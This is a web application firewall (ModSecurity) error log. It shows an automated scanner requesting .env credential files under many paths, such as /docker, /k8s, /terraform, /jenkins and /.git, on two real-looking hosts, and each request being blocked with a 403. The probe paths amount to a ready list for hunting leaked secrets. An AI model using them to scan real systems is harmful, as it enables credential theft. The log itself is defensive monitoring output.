[Mon May 11 16:42:00.447785 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHquFV4kyjgo4bQBUha4gAAAMg"]
[Mon May 11 16:42:00.448020 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cloud/.env"] [unique_id "agHquFV4kyjgo4bQBUha4gAAAMg"]
[Mon May 11 16:42:00.611535 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /infrastructure/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4wAAAMg"]
[Mon May 11 16:42:00.612011 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4wAAAMg"]
[Mon May 11 16:42:00.612246 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/infrastructure/.env"] [unique_id "agHquFV4kyjgo4bQBUha4wAAAMg"]
[Mon May 11 16:42:00.774904 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHquFV4kyjgo4bQBUha5QAAAMg"]
[Mon May 11 16:42:00.775433 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHquFV4kyjgo4bQBUha5QAAAMg"]
[Mon May 11 16:42:00.775664 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/docker/.env"] [unique_id "agHquFV4kyjgo4bQBUha5QAAAMg"]
[Mon May 11 16:42:00.946361 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /k8s/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHquFV4kyjgo4bQBUha5gAAAMg"]
[Mon May 11 16:42:00.946828 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHquFV4kyjgo4bQBUha5gAAAMg"]
[Mon May 11 16:42:00.947058 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/k8s/.env"] [unique_id "agHquFV4kyjgo4bQBUha5gAAAMg"]
[Mon May 11 16:42:01.117700 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kubernetes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHquVV4kyjgo4bQBUha5wAAAMg"]
[Mon May 11 16:42:01.118198 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHquVV4kyjgo4bQBUha5wAAAMg"]
[Mon May 11 16:42:01.118428 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/kubernetes/.env"] [unique_id "agHquVV4kyjgo4bQBUha5wAAAMg"]
[Mon May 11 16:42:01.279509 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /terraform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHquVV4kyjgo4bQBUha6AAAAMg"]
[Mon May 11 16:42:01.280007 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHquVV4kyjgo4bQBUha6AAAAMg"]
[Mon May 11 16:42:01.280250 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/terraform/.env"] [unique_id "agHquVV4kyjgo4bQBUha6AAAAMg"]
[Mon May 11 16:42:01.302135 2026] [security2:error] [pid 1412074:tid 1412088] [client 45.12.2.133:37346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agHqtzJnyuKVXoStDha6pAAAAEw"]
[Mon May 11 16:42:01.442923 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ansible/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHquVV4kyjgo4bQBUha6QAAAMg"]
[Mon May 11 16:42:01.443420 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHquVV4kyjgo4bQBUha6QAAAMg"]
[Mon May 11 16:42:01.443644 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ansible/.env"] [unique_id "agHquVV4kyjgo4bQBUha6QAAAMg"]
[Mon May 11 16:42:01.614662 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHquVV4kyjgo4bQBUha6gAAAMg"]
[Mon May 11 16:42:01.615133 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHquVV4kyjgo4bQBUha6gAAAMg"]
[Mon May 11 16:42:01.615379 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/.env"] [unique_id "agHquVV4kyjgo4bQBUha6gAAAMg"]
[Mon May 11 16:42:01.776562 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /ci/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHquVV4kyjgo4bQBUha7AAAAMg"]
[Mon May 11 16:42:01.777062 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHquVV4kyjgo4bQBUha7AAAAMg"]
[Mon May 11 16:42:01.777326 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/ci/.env"] [unique_id "agHquVV4kyjgo4bQBUha7AAAAMg"]
[Mon May 11 16:42:01.938895 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cd/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHquVV4kyjgo4bQBUha7gAAAMg"]
[Mon May 11 16:42:01.939385 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHquVV4kyjgo4bQBUha7gAAAMg"]
[Mon May 11 16:42:01.939623 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cd/.env"] [unique_id "agHquVV4kyjgo4bQBUha7gAAAMg"]
[Mon May 11 16:42:01.975503 2026] [security2:error] [pid 1412074:tid 1412097] [client 45.12.2.133:37358] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.www"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.www"] [unique_id "agHquTJnyuKVXoStDha6pgAAAFU"]
[Mon May 11 16:42:01.976060 2026] [security2:error] [pid 1412074:tid 1412097] [client 45.12.2.133:37358] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.www"] [unique_id "agHquTJnyuKVXoStDha6pgAAAFU"]
[Mon May 11 16:42:02.101757 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /jenkins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHqulV4kyjgo4bQBUha7wAAAMg"]
[Mon May 11 16:42:02.102348 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHqulV4kyjgo4bQBUha7wAAAMg"]
[Mon May 11 16:42:02.102627 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/jenkins/.env"] [unique_id "agHqulV4kyjgo4bQBUha7wAAAMg"]
[Mon May 11 16:42:02.263982 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /gitlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHqulV4kyjgo4bQBUha8AAAAMg"]
[Mon May 11 16:42:02.264475 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHqulV4kyjgo4bQBUha8AAAAMg"]
[Mon May 11 16:42:02.264741 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/gitlab/.env"] [unique_id "agHqulV4kyjgo4bQBUha8AAAAMg"]
[Mon May 11 16:42:02.426520 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /github/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHqulV4kyjgo4bQBUha8QAAAMg"]
[Mon May 11 16:42:02.427236 2026] [security2:error] [pid 1416109:tid 1416138] [client 16.148.67.252:37048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/github/.env"] [unique_id "agHqulV4kyjgo4bQBUha8QAAAMg"]
